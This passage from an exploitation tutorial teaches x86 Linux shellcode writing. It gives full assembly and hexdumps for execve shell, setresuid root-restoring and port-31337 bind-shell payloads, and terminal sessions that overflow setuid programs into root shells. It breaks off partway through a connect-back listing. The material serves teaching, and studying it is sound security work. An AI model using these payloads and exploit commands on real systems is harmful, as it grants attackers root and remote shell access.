reader@hacking:~/booksrc/shellcodes $

This shellcode can be shrunk down further by redesigning it and using registers more efficiently. The ESP register is the stack pointer, pointing to the top of the stack. When a value is pushed to the stack, ESP is moved up in memory (by subtracting 4) and the value is placed at the top of the stack. When a value is popped from the stack, the pointer in ESP is moved down in memory (by adding 4).

The following shellcode uses push instructions to build the necessary structures in memory for the execve() system call.

tiny_shell.s

BITS 32

; execve(const char *filename, char *const argv [], char *const envp[])

xor eax, eax ; Zero out eax.

push eax ; Push some nulls for string termination.

push 0x68732f2f ; Push "//sh" to the stack.

push 0x6e69622f ; Push "/bin" to the stack.

mov ebx, esp ; Put the address of "/bin//sh" into ebx, via esp.

push eax ; Push 32-bit null terminator to stack.

mov edx, esp ; This is an empty array for envp.

push ebx ; Push string addr to stack above null terminator.

mov ecx, esp ; This is the argv array with string ptr.

mov al, 11 ; Syscall #11.

int 0x80 ; Do it.

This shellcode builds the null-terminated string "/bin//sh" on the stack, and then copies ESP for the pointer. The extra backslash doesn't matter and is effectively ignored. The same method is used to build the arrays for the remaining arguments. The resulting shellcode still spawns a shell but is only 25 bytes, compared to 36 bytes using the jmp call method.

reader@hacking:~/booksrc $ nasm tiny_shell.s

reader@hacking:~/booksrc $ wc -c tiny_shell

25 tiny_shell

reader@hacking:~/booksrc $ hexdump -C tiny_shell

00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 |1.Ph//shh/bin..P|

00000010 89 e2 53 89 e1 b0 0b cd 80 |..S......|

00000019

reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9cb

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xcb\xf9\xff\xbf"x40')

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

[DEBUG] found a 5 byte note for user id 999

[DEBUG] found a 35 byte note for user id 999

[DEBUG] found a 9 byte note for user id 999

[DEBUG] found a 33 byte note for user id 999

-------[ end of note data ]-------

sh-3.2#

A Matter of Privilege

To help mitigate rampant privilege escalation, some privileged processes will lower their effective privileges while doing things that don't require that kind of access. This can be done with the seteuid() function, which will set the effective user ID. By changing the effective user ID, the privileges of the process can be changed. The manual page for the seteuid() function is shown below.

SETEGID(2) Linux Programmer's Manual SETEGID(2)

NAME

seteuid, setegid - set effective user or group ID

SYNOPSIS

#include <sys/types.h>

#include <unistd.h>

int seteuid(uid_t euid);

int setegid(gid_t egid);

DESCRIPTION

seteuid() sets the effective user ID of the current process.

Unprivileged user processes may only set the effective user ID to

ID to the real user ID, the effective user ID or the saved set-user-ID.

Precisely the same holds for setegid() with "group" instead of "user".

RETURN VALUE

On success, zero is returned. On error, -1 is returned, and errno is

set appropriately.

This function is used by the following code to drop privileges down to those of the "games" user before the vulnerable strcpy() call.

drop_privs.c

#include <unistd.h>

void lowered_privilege_function(unsigned char *ptr) {

char buffer[50];

seteuid(5); // Drop privileges to games user.

strcpy(buffer, ptr);

}

int main(int argc, char *argv[]) {

if (argc > 0)

lowered_privilege_function(argv[1]);

}

Even though this compiled program is setuid root, the privileges are dropped to the games user before the shellcode can execute. This only spawns a shell for the games user, without root access.

reader@hacking:~/booksrc $ gcc -o drop_privs drop_privs.c

reader@hacking:~/booksrc $ sudo chown root ./drop_privs; sudo chmod u+s ./drop_privs

reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./drop_privs

SHELLCODE will be at 0xbffff9cb

reader@hacking:~/booksrc $ ./drop_privs $(perl -e 'print "\xcb\xf9\xff\xbf"x40')

sh-3.2$ whoami

games

sh-3.2$ id

uid=999(reader) gid=999(reader) euid=5(games)

groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),

104(scan

ner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)

sh-3.2$

Fortunately, the privileges can easily be restored at the beginning of our shellcode with a system call to set the privileges back to root. The most complete way to do this is with a setresuid() system call, which sets the real, effective, and saved user IDs. The system call number and manual page are shown below.

reader@hacking:~/booksrc $ grep -i setresuid /usr/include/asm-i386/unistd.h

#define __NR_setresuid 164

#define __NR_setresuid32 208

reader@hacking:~/booksrc $ man 2 setresuid

SETRESUID(2) Linux Programmer's Manual SETRESUID(2)

NAME

setresuid, setresgid - set real, effective and saved user or group ID

SYNOPSIS

#define _GNU_SOURCE

#include <unistd.h>

int setresuid(uid_t ruid, uid_t euid, uid_t suid);

int setresgid(gid_t rgid, gid_t egid, gid_t sgid);

DESCRIPTION

setresuid() sets the real user ID, the effective user ID, and the saved

set-user-ID of the current process.

The following shellcode makes a call to setresuid() before spawning the shell to restore root privileges.

priv_shell.s

BITS 32

; setresuid(uid_t ruid, uid_t euid, uid_t suid);

xor eax, eax ; Zero out eax.

xor ebx, ebx ; Zero out ebx.

xor ecx, ecx ; Zero out ecx.

xor edx, edx ; Zero out edx.

mov al, 0xa4 ; 164 (0xa4) for syscall #164

int 0x80 ; setresuid(0, 0, 0) Restore all root privs.

; execve(const char *filename, char *const argv [], char *const envp[])

xor eax, eax ; Make sure eax is zeroed again.

mov al, 11 ; syscall #11

push ecx ; push some nulls for string termination.

push 0x68732f2f ; push "//sh" to the stack.

push 0x6e69622f ; push "/bin" to the stack.

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.

push ecx ; push 32-bit null terminator to stack.

mov edx, esp ; This is an empty array for envp.

push ebx ; push string addr to stack above null terminator.

mov ecx, esp ; This is the argv array with string ptr.

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

This way, even if a program is running under lowered privileges when it's exploited, the shellcode can restore the privileges. This effect is demonstrated below by exploiting the same program with dropped privileges.

reader@hacking:~/booksrc $ nasm priv_shell.s

reader@hacking:~/booksrc $ export SHELLCODE=$(cat priv_shell)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./drop_privs

SHELLCODE will be at 0xbffff9bf

reader@hacking:~/booksrc $ ./drop_privs $(perl -e 'print "\xbf\xf9\xff\xbf"x40')

sh-3.2# whoami

root

sh-3.2# id

uid=0(root) gid=999(reader)

groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),

104(scan

ner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)

sh-3.2#

And Smaller Still

A few more bytes can still be shaved off this shellcode. There is a single-byte x86 instruction called cdq, which stands for convert doubleword to quadword. Instead of using operands, this instruction always gets its source from the EAX register and stores the results between the EDX and EAX registers. Since the registers are 32-bit doublewords, it takes two registers to store a 64-bit quadword. The conversion is simply a matter of extending the sign bit from a 32-bit integer to 64-bit integer. Operationally, this means if the sign bit of EAX is 0, the cdq instruction will zero the EDX register. Using xor to zero the EDX register requires two bytes; so, if EAX is already zeroed, using the cdqinstruction to zero EDX will save one byte

31 D2 xor edx,edx

compared to

99 cdq

Another byte can be saved with clever use of the stack. Since the stack is 32-bit aligned, a single byte value pushed to the stack will be aligned as a doubleword. When this value is popped off, it will be sign-extended, filling the entire register. The instructions that push a single byte and pop it back into a register take three bytes, while using xor to zero the register and moving a single byte takes four bytes

31 C0 xor eax,eax

B0 0B mov al,0xb

compared to

6A 0B push byte +0xb

58 pop eax

These tricks (shown in bold) are used in the following shellcode listing. This assembles into the same shellcode as that used in the previous chapters.

shellcode.s

BITS 32

; setresuid(uid_t ruid, uid_t euid, uid_t suid);

xor eax, eax ; Zero out eax.

xor ebx, ebx ; Zero out ebx.

xor ecx, ecx ; Zero out ecx.

cdq ; Zero out edx using the sign bit from eax.

mov BYTE al, 0xa4 ; syscall 164 (0xa4)

int 0x80 ; setresuid(0, 0, 0) Restore all root privs.

; execve(const char *filename, char *const argv [], char *const envp[])

push BYTE 11 ; push 11 to the stack.

pop eax ; pop the dword of 11 into eax.

push ecx ; push some nulls for string termination.

push 0x68732f2f ; push "//sh" to the stack.

push 0x6e69622f ; push "/bin" to the stack.

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.

push ecx ; push 32-bit null terminator to stack.

mov edx, esp ; This is an empty array for envp.

push ebx ; push string addr to stack above null terminator.

mov ecx, esp ; This is the argv array with string ptr.

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

The syntax for pushing a single byte requires the size to be declared. Valid sizes are BYTE for one byte, WORD for two bytes, and DWORD for four bytes. These sizes can be implied from register widths, so moving into the AL register implies the BYTE size. While it's not necessary to use a size in all situations, it doesn't hurt and can help readability.

Port-Binding Shellcode

When exploiting a remote program, the shellcode we've designed so far won't work. The injected shellcode needs to communicate over the network to deliver an interactive root prompt. Port-binding shellcode will bind the shell to a network port where it listens for incoming connections. In the previous chapter, we used this kind of shellcode to exploit the tinyweb server. The following C code binds to port 31337 and listens for a TCP connection.

Port-Binding Shellcode

bind_port.c

#include <unistd.h>

#include <string.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

int main(void) {

int sockfd, new_sockfd; // Listen on sock_fd, new connection on new_fd

struct sockaddr_in host_addr, client_addr; // My address information

socklen_t sin_size;

int yes=1;

sockfd = socket(PF_INET, SOCK_STREAM, 0);

host_addr.sin_family = AF_INET; // Host byte order

host_addr.sin_port = htons(31337); // Short, network byte order

host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.

memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));

listen(sockfd, 4);

sin_size = sizeof(struct sockaddr_in);

new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);

}

These familiar socket functions can all be accessed with a single Linux system call, aptly named socketcall(). This is syscall number 102, which has a slightly cryptic manual page.

reader@hacking:~/booksrc $ grep socketcall /usr/include/asm-i386/unistd.h

#define __NR_socketcall 102

reader@hacking:~/booksrc $ man 2 socketcall

IPC(2) Linux Programmer's Manual IPC(2)

NAME

socketcall - socket system calls

SYNOPSIS

int socketcall(int call, unsigned long *args);

DESCRIPTION

socketcall() is a common kernel entry point for the socket system calls. call

determines which socket function to invoke. args points to a block containing

the actual arguments, which are passed through to the appropriate call.

User programs should call the appropriate functions by their usual

names. Only standard library implementors and kernel hackers need to

know about socketcall().

The possible call numbers for the first argument are listed in the linux/net.h include file.

From /usr/include/linux/net.h

#define SYS_SOCKET 1 /* sys_socket(2) */

#define SYS_BIND 2 /* sys_bind(2) */

#define SYS_CONNECT 3 /* sys_connect(2) */

#define SYS_LISTEN 4 /* sys_listen(2) */

#define SYS_ACCEPT 5 /* sys_accept(2) */

#define SYS_GETSOCKNAME 6 /* sys_getsockname(2) */

#define SYS_GETPEERNAME 7 /* sys_getpeername(2) */

#define SYS_SOCKETPAIR 8 /* sys_socketpair(2) */

#define SYS_SEND 9 /* sys_send(2) */

#define SYS_RECV 10 /* sys_recv(2) */

#define SYS_SENDTO 11 /* sys_sendto(2) */

#define SYS_RECVFROM 12 /* sys_recvfrom(2) */

#define SYS_SHUTDOWN 13 /* sys_shutdown(2) */

#define SYS_SETSOCKOPT 14 /* sys_setsockopt(2) */

#define SYS_GETSOCKOPT 15 /* sys_getsockopt(2) */

#define SYS_SENDMSG 16 /* sys_sendmsg(2) */

#define SYS_RECVMSG 17 /* sys_recvmsg(2) */

So, to make socket system calls using Linux, EAX is always 102 for socketcall(), EBX contains the type of socket call, and ECX is a pointer to the socket call's arguments. The calls are simple enough, but some of them require a sockaddr structure, which must be built by the shellcode. Debugging the compiled C code is the most direct way to look at this structure in memory.

reader@hacking:~/booksrc $ gcc -g bind_port.c

reader@hacking:~/booksrc $ gdb -q ./a.out

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) list 18

13 sockfd = socket(PF_INET, SOCK_STREAM, 0);

14

15 host_addr.sin_family = AF_INET; // Host byte order

16 host_addr.sin_port = htons(31337); // Short, network byte order

17 host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.

18 memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

19

20 bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));

21

22 listen(sockfd, 4);

(gdb) break 13

Breakpoint 1 at 0x804849b: file bind_port.c, line 13.

(gdb) break 20

Breakpoint 2 at 0x80484f5: file bind_port.c, line 20.

(gdb) run

Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at bind_port.c:13

13 sockfd = socket(PF_INET, SOCK_STREAM, 0);

(gdb) x/5i $eip

0x804849b <main+23>: mov DWORD PTR [esp+8],0x0

0x80484a3 <main+31>: mov DWORD PTR [esp+4],0x1

0x80484ab <main+39>: mov DWORD PTR [esp],0x2

0x80484b2 <main+46>: call 0x8048394 <socket@plt>

0x80484b7 <main+51>: mov DWORD PTR [ebp-12],eax

(gdb)

The first breakpoint is just before the socket call happens, since we need to check the values of PF_INET and SOCK_STREAM. All three arguments are pushed to the stack (but with mov instructions) in reverse order. This means PF_INET is 2 and SOCK_STREAM is 1.

(gdb) cont

Continuing.

Breakpoint 2, main () at bind_port.c:20

20 bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));

(gdb) print host_addr

$1 = {sin_family = 2, sin_port = 27002, sin_addr = {s_addr = 0},

sin_zero = "\000\000\000\000\000\000\000"}

(gdb) print sizeof(struct sockaddr)

$2 = 16

(gdb) x/16xb &host_addr

0xbffff780: 0x02 0x00 0x7a 0x69 0x00 0x00 0x00 0x00

0xbffff788: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

(gdb) p /x 27002

$3 = 0x697a

(gdb) p 0x7a69

$4 = 31337

(gdb)

The next breakpoint happens after the sockaddr structure is filled with values. The debugger is smart enough to decode the elements of the structure when host_addr is printed, but now you need to be smart enough to realize the port is stored in network byte order. The sin_family and sin_port elements are both words, followed by the address as a DWORD. In this case, the address is 0, which means any address can be used for binding. The remaining eight bytes after that are just extra space in the structure. The first eight bytes in the structure (shown in bold) contain all the important information.

The following assembly instructions perform all the socket calls needed to bind to port 31337 and accept TCP connections. The sockaddr structure and the argument arrays are each created by pushing values in reverse order to the stack and then copying ESP into ECX. The last eight bytes of the sockaddr structure aren't actually pushed to the stack, since they aren't used. Whatever random eight bytes happen to be on the stack will occupy this space, which is fine.

bind_port.s

BITS 32

; s = socket(2, 1, 0)

push BYTE 0x66 ; socketcall is syscall #102 (0x66).

pop eax

cdq ; Zero out edx for use as a null DWORD later.

xor ebx, ebx ; ebx is the type of socketcall.

inc ebx ; 1 = SYS_SOCKET = socket()

push edx ; Build arg array: { protocol = 0,

push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,

push BYTE 0x2 ; AF_INET = 2 }

mov ecx, esp ; ecx = ptr to argument array

int 0x80 ; After syscall, eax has socket file descriptor.

mov esi, eax ; save socket FD in esi for later

; bind(s, [2, 31337, 0], 16)

push BYTE 0x66 ; socketcall (syscall #102)

pop eax

inc ebx ; ebx = 2 = SYS_BIND = bind()

push edx ; Build sockaddr struct: INADDR_ANY = 0

push WORD 0x697a ; (in reverse order) PORT = 31337

push WORD bx ; AF_INET = 2

mov ecx, esp ; ecx = server struct pointer

push BYTE 16 ; argv: { sizeof(server struct) = 16,

push ecx ; server struct pointer,

push esi ; socket file descriptor }

mov ecx, esp ; ecx = argument array

int 0x80 ; eax = 0 on success

; listen(s, 0)

mov BYTE al, 0x66 ; socketcall (syscall #102)

inc ebx

inc ebx ; ebx = 4 = SYS_LISTEN = listen()

push ebx ; argv: { backlog = 4,

push esi ; socket fd }

mov ecx, esp ; ecx = argument array

int 0x80

; c = accept(s, 0, 0)

mov BYTE al, 0x66 ; socketcall (syscall #102)

inc ebx ; ebx = 5 = SYS_ACCEPT = accept()

push edx ; argv: { socklen = 0,

push edx ; sockaddr ptr = NULL,

push esi ; socket fd }

mov ecx, esp ; ecx = argument array

int 0x80 ; eax = connected socket FD

When assembled and used in an exploit, this shellcode will bind to port 31337 and wait for an incoming connection, blocking at the accept call. When a connection is accepted, the new socket file descriptor is put into EAX at the end of this code. This won't really be useful until it's combined with the shell-spawning code described earlier. Fortunately, standard file descriptors make this fusion remarkably simple.

Duplicating Standard File Descriptors

Standard input, standard output, and standard error are the three standard file descriptors used by programs to perform standard I/O. Sockets, too, are just file descriptors that can be read from and written to. By simply swapping the standard input, output, and error of the spawned shell with the connected socket file descriptor, the shell will write output and errors to the socket and read its input from the bytes that the socket received. There is a system call specifically for duplicating file descriptors, called dup2. This is system call number 63.

reader@hacking:~/booksrc $ grep dup2 /usr/include/asm-i386/unistd.h

#define __NR_dup2 63

reader@hacking:~/booksrc $ man 2 dup2

DUP(2) Linux Programmer's Manual DUP(2)

NAME

dup, dup2 - duplicate a file descriptor

SYNOPSIS

#include <unistd.h>

int dup(int oldfd);

int dup2(int oldfd, int newfd);

DESCRIPTION

dup() and dup2() create a copy of the file descriptor oldfd.

dup2() makes newfd be the copy of oldfd, closing newfd first if necessary.

The bind_port.s shellcode left off with the connected socket file descriptor in EAX. The following instructions are added in the file bind_shell_beta.s to duplicate this socket into the standard I/O file descriptors; then, the tiny_shell instructions are called to execute a shell in the current process. The spawned shell's standard input and output file descriptors will be the TCP connection, allowing remote shell access.

New Instructions from bind_shell1.s

; dup2(connected socket, {all three standard I/O file descriptors})

mov ebx, eax ; Move socket FD in ebx.

push BYTE 0x3F ; dup2 syscall #63

pop eax

xor ecx, ecx ; ecx = 0 = standard input

int 0x80 ; dup(c, 0)

mov BYTE al, 0x3F ; dup2 syscall #63

inc ecx ; ecx = 1 = standard output

int 0x80 ; dup(c, 1)

mov BYTE al, 0x3F ; dup2 syscall #63

inc ecx ; ecx = 2 = standard error

int 0x80 ; dup(c, 2)

; execve(const char *filename, char *const argv [], char *const envp[])

mov BYTE al, 11 ; execve syscall #11

push edx ; push some nulls for string termination.

push 0x68732f2f ; push "//sh" to the stack.

push 0x6e69622f ; push "/bin" to the stack.

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.

push ecx ; push 32-bit null terminator to stack.

mov edx, esp ; This is an empty array for envp.

push ebx ; push string addr to stack above null terminator.

mov ecx, esp ; This is the argv array with string ptr.

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

When this shellcode is assembled and used in an exploit, it will bind to port 31337 and wait for an incoming connection. In the output below, grep is used to quickly check for null bytes. At the end, the process hangs waiting for a connection.

reader@hacking:~/booksrc $ nasm bind_shell_beta.s

reader@hacking:~/booksrc $ hexdump -C bind_shell_beta | grep --color=auto 00

00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|

00000010 89 c6 6a 66 58 43 52 66 68 7a 69 66 53 89 e1 6a |..jfXCRfhzifS..j|

00000020 10 51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd |.QV.....fCCSV...|

00000030 80 b0 66 43 52 52 56 89 e1 cd 80 89 c3 6a 3f 58 |..fCRRV......j?X|

00000040 31 c9 cd 80 b0 3f 41 cd 80 b0 3f 41 cd 80 b0 0b |1....?A...?A....|

00000050 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 e2 |Rh//shh/bin..R..|

00000060 53 89 e1 cd 80 |S....|

00000065

reader@hacking:~/booksrc $ export SHELLCODE=$(cat bind_shell_beta)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff97f

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x7f\xf9\xff\xbf"x40')

[DEBUG] found a 33 byte note for user id 999

-------[ end of note data ]-------

From another terminal window, the program netstat is used to find the listening port. Then, netcat is used to connect to the root shell on that port.

reader@hacking:~/booksrc $ sudo netstat -lp | grep 31337

tcp 0 0 *:31337 *:* LISTEN 25604/notesearch

reader@hacking:~/booksrc $ nc -vv 127.0.0.1 31337

localhost [127.0.0.1] 31337 (?) open

whoami

root

Branching Control Structures

The control structures of the C programming language, such as for loops and if-then-else blocks, are made up of conditional branches and loops in the machine language. With control structures, the repeated calls to dup2 could be shrunk down to a single call in a loop. The first C program written in previous chapters used a for loop to greet the world 10 times. Disassembling the main function will show us how the compiler implemented the for loop using assembly instructions. The loop instructions (shown below in bold) come after the function prologue instructions save stack memory for the local variable i. This variable is referenced in relation to the EBP register as [ebp-4].

reader@hacking:~/booksrc $ gcc firstprog.c

reader@hacking:~/booksrc $ gdb -q ./a.out

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) disass main

Dump of assembler code for function main:

0x08048374 <main+0>: push ebp

0x08048375 <main+1>: mov ebp,esp

0x08048377 <main+3>: sub esp,0x8

0x0804837a <main+6>: and esp,0xfffffff0

0x0804837d <main+9>: mov eax,0x0

0x08048382 <main+14>: sub esp,eax

0x08048384 <main+16>: mov DWORD PTR [ebp-4],0x0

0x0804838b <main+23>: cmp DWORD PTR [ebp-4],0x9

0x0804838f <main+27>: jle 0x8048393 <main+31>

0x08048391 <main+29>: jmp 0x80483a6 <main+50>

0x08048393 <main+31>: mov DWORD PTR [esp],0x8048484

0x0804839a <main+38>: call 0x80482a0 <printf@plt>

0x0804839f <main+43>: lea eax,[ebp-4]

0x080483a2 <main+46>: inc DWORD PTR [eax]

0x080483a4 <main+48>: jmp 0x804838b <main+23>

0x080483a6 <main+50>: leave

0x080483a7 <main+51>: ret

End of assembler dump.

(gdb)

The loop contains two new instructions: cmp (compare) and jle (jump if less than or equal to), the latter belonging to the family of conditional jump instructions. The cmp instruction will compare its two operands, setting flags based on the result. Then, a conditional jump instruction will jump based on the flags. In the code above, if the value at [ebp-4] is less than or equal to 9, execution will jump to 0x8048393, past the next jmp instruction. Otherwise, the next jmp instruction brings execution to the end of the function at 0x080483a6, exiting the loop. The body of the loop makes the call to printf(), increments the counter variable at [ebp-4], and finally jumps back to the compare instruction to continue the loop. Using conditional jump instructions, complex programming control structures such as loops can be created in assembly. More conditional jump instructions are shown below.

Instruction

Description

cmp <dest>, <source>

Compare the destination operand with the source, setting flags for use with a conditional jump instruction.

je <target>

Jump to target if the compared values are equal.

jne <target>

Jump if not equal.

jl <target>

Jump if less than.

jle <target>

Jump if less than or equal to.

jnl <target>

Jump if not less than.

jnle <target>

Jump if not less than or equal to.

jg jge

Jump if greater than, or greater than or equal to.

jng jnge

Jump if not greater than, or not greater than or equal to.

These instructions can be used to shrink the dup2 portion of the shellcode down to the following:

; dup2(connected socket, {all three standard I/O file descriptors})

mov ebx, eax ; Move socket FD in ebx.

xor eax, eax ; Zero eax.

xor ecx, ecx ; ecx = 0 = standard input

dup_loop:

mov BYTE al, 0x3F ; dup2 syscall #63

int 0x80 ; dup2(c, 0)

inc ecx

cmp BYTE cl, 2 ; Compare ecx with 2.

jle dup_loop ; If ecx <= 2, jump to dup_loop.

This loop iterates ECX from 0 to 2, making a call to dup2 each time. With a more complete understanding of the flags used by the cmp instruction, this loop can be shrunk even further. The status flags set by the cmp instruction are also set by most other instructions, describing the attributes of the instruction's result. These flags are carry flag (CF), parity flag (PF), adjust flag (AF), overflow flag (OF), zero flag (ZF), and sign flag (SF). The last two flags are the most useful and the easiest to understand. The zero flag is set to true if the result is zero, otherwise it is false. The sign flag is simply the most significant bit of the result, which is true if the result is negative and false otherwise. This means that, after any instruction with a negative result, the sign flag becomes true and the zero flag becomes false.

Abbreviation

Name

Description

ZF

zero flag

True if the result is zero.

SF

sign flag

True if the result is negative (equal to the most significant bit of result).

The cmp (compare) instruction is actually just a sub (subtract) instruction that throws away the results, only affecting the status flags. The jle (jump if less than or equal to) instruction is actually checking the zero and sign flags. If either of these flags is true, then the destination (first) operand is less than or equal to the source (second) operand. The other conditional jump instructions work in a similar way, and there are still more conditional jump instructions that directly check individual status flags:

Instruction

Description

jz <target>

Jump to target if the zero flag is set.

jnz <target>

Jump if the zero flag is not set.

js <target>

Jump if the sign flag is set.

jns <target>

Jump is the sign flag is not set.

With this knowledge, the cmp (compare) instruction can be removed entirely if the loop's order is reversed. Starting from 2 and counting down, the sign flag can be checked to loop until 0. The shortened loop is shown below, with the changes shown in bold.

; dup2(connected socket, {all three standard I/O file descriptors})

mov ebx, eax ; Move socket FD in ebx.

xor eax, eax ; Zero eax.

push BYTE 0x2 ; ecx starts at 2.

pop ecx

dup_loop:

mov BYTE al, 0x3F ; dup2 syscall #63

int 0x80 ; dup2(c, 0)

dec ecx ; Count down to 0.

jns dup_loop ; If the sign flag is not set, ecx is not negative.

The first two instructions before the loop can be shortened with the xchg(exchange) instruction. This instruction swaps the values between the source and destination operands:

Instruction

Description

xchg <dest>, <source>

Exchange the values between the two operands.

This single instruction can replace both of the following instructions, which take up four bytes:

89 C3 mov ebx,eax

31 C0 xor eax,eax

The EAX register needs to be zeroed to clear only the upper three bytes of the register, and EBX already has these upper bytes cleared. So swapping the values between EAX and EBX will kill two birds with one stone, reducing the size to the following single-byte instruction:

93 xchg eax,ebx

Since the xchg instruction is actually smaller than a mov instruction between two registers, it can be used to shrink shellcode in other places. Naturally, this only works in situations where the source operand's register doesn't matter. The following version of the bind port shellcode uses the exchange instruction to shave a few more bytes off its size.

bind_shell.s

BITS 32

; s = socket(2, 1, 0)

push BYTE 0x66 ; socketcall is syscall #102 (0x66).

pop eax

cdq ; Zero out edx for use as a null DWORD later.

xor ebx, ebx ; Ebx is the type of socketcall.

inc ebx ; 1 = SYS_SOCKET = socket()

push edx ; Build arg array: { protocol = 0,

push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,

push BYTE 0x2 ; AF_INET = 2 }

mov ecx, esp ; ecx = ptr to argument array

int 0x80 ; After syscall, eax has socket file descriptor.

xchg esi, eax ; Save socket FD in esi for later.

; bind(s, [2, 31337, 0], 16)

push BYTE 0x66 ; socketcall (syscall #102)

pop eax

inc ebx ; ebx = 2 = SYS_BIND = bind()

push edx ; Build sockaddr struct: INADDR_ANY = 0

push WORD 0x697a ; (in reverse order) PORT = 31337

push WORD bx ; AF_INET = 2

mov ecx, esp ; ecx = server struct pointer

push BYTE 16 ; argv: { sizeof(server struct) = 16,

push ecx ; server struct pointer,

push esi ; socket file descriptor }

mov ecx, esp ; ecx = argument array

int 0x80 ; eax = 0 on success

; listen(s, 0)

mov BYTE al, 0x66 ; socketcall (syscall #102)

inc ebx

inc ebx ; ebx = 4 = SYS_LISTEN = listen()

push ebx ; argv: { backlog = 4,

push esi ; socket fd }

mov ecx, esp ; ecx = argument array

int 0x80

; c = accept(s, 0, 0)

mov BYTE al, 0x66 ; socketcall (syscall #102)

inc ebx ; ebx = 5 = SYS_ACCEPT = accept()

push edx ; argv: { socklen = 0,

push edx ; sockaddr ptr = NULL,

push esi ; socket fd }

mov ecx, esp ; ecx = argument array

int 0x80 ; eax = connected socket FD

; dup2(connected socket, {all three standard I/O file descriptors})

xchg eax, ebx ; Put socket FD in ebx and 0x00000005 in eax.

push BYTE 0x2 ; ecx starts at 2.

pop ecx

dup_loop:

mov BYTE al, 0x3F ; dup2 syscall #63

int 0x80 ; dup2(c, 0)

dec ecx ; count down to 0

jns dup_loop ; If the sign flag is not set, ecx is not negative.

; execve(const char *filename, char *const argv [], char *const envp[])

mov BYTE al, 11 ; execve syscall #11

push edx ; push some nulls for string termination.

push 0x68732f2f ; push "//sh" to the stack.

push 0x6e69622f ; push "/bin" to the stack.

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.

push edx ; push 32-bit null terminator to stack.

mov edx, esp ; This is an empty array for envp.

push ebx ; push string addr to stack above null terminator.

mov ecx, esp ; This is the argv array with string ptr

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

This assembles to the same 92-byte bind_shell shellcode used in the previous chapter.

reader@hacking:~/booksrc $ nasm bind_shell.s

reader@hacking:~/booksrc $ hexdump -C bind_shell

00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|

00000010 96 6a 66 58 43 52 66 68 7a 69 66 53 89 e1 6a 10 |.jfXCRfhzifS..j.|

00000020 51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd 80 |QV.....fCCSV....|

00000030 b0 66 43 52 52 56 89 e1 cd 80 93 6a 02 59 b0 3f |.fCRRV.....j.Y.?|

00000040 cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 2f 62 |..Iy...Rh//shh/b|

00000050 69 6e 89 e3 52 89 e2 53 89 e1 cd 80 |in..R..S....|

0000005c

reader@hacking:~/booksrc $ diff bind_shell portbinding_shellcode

Connect-Back Shellcode

Port-binding shellcode is easily foiled by firewalls. Most firewalls will block incoming connections, except for certain ports with known services. This limits the user's exposure and will prevent port-binding shellcode from receiving a connection. Software firewalls are now so common that port-bind shellcode has little chance of actually working in the wild.

However, firewalls typically do not filter outbound connections, since that would hinder usability. From inside the firewall, a user should be able to access any web page or make any other outbound connections. This means that if the shellcode initiates the outbound connection, most firewalls will allow it.

Instead of waiting for a connection from an attacker, connect-back shellcode initiates a TCP connection back to the attacker's IP address. Opening a TCP connection only requires a call to socket() and a call to connect(). This is very similar to the bind-port shellcode, since the socket call is exactly the same and the connect() call takes the same type of arguments as bind(). The following connect-back shellcode was made from the bind-port shellcode with a few modifications (shown in bold).

Connect-Back Shellcode

connectback_shell.s

BITS 32

; s = socket(2, 1, 0)

push BYTE 0x66 ; socketcall is syscall #102 (0x66).

pop eax

cdq ; Zero out edx for use as a null DWORD later.

xor ebx, ebx ; ebx is the type of socketcall.

inc ebx ; 1 = SYS_SOCKET = socket()

push edx ; Build arg array: { protocol = 0,

push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,

push BYTE 0x2 ; AF_INET = 2 }

mov ecx, esp ; ecx = ptr to argument array

